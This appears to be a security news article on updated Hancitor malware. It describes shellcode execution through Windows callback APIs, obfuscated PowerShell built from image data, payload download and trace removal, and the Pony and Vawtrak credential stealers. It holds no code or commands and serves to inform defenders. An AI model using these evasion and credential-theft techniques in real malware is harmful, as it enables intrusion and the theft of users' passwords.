The criminals behind the Hancitor malware have updated the code adding new delivery methods that offer advanced stealth protection.
Hancitor Gets Even More Dangerous Than Before
The criminal developers of Hancitor have updated the code of the malware by adding new delivery methods and features that make it more difficult for security software to spot it. Hancitor is a popular tool that is used by hackers worldwide in various phishing and spam schemes.
The downloader still uses the old spread mechanism via spam email attachments. The discovered samples that were delivered using Hancitor were the information stealing malware Pony and Vawtrak. However the security researchers have stated that the payload system that is used by Hancitor has been changed.
- The new modifications use the native Windows API CallWindowProc to execute malicious shellcode.
- A second mechanism is also available that uses the callback function EnumResourceTypesA to interpret and execute shellcode.
- The last addition delivery technique relies on using obscure and malicious PowerShell commands.
The last delivery option is actually fairy complex. The malware uses various code fragments that are taken from the section_header of the embedded image file to craft the command. The attackers use a small font size to obscure the PowerShell text. The next step is to obtain the payload from the attacker-controlled site in a zipped archive and decompress it on the local machine. This is a great way to evade the standard detection methods that are used by security software. When the executable is downloaded, the code deletes the archive to remove any traces. The next step is to execute the downloader malware – the Pony password stealer and the Vawtrak Trojan.
The bundled version of Pony allows the criminals to gather stored data in the browsers such as saved passwords and other form information. This also works for Microsoft Outlook account data.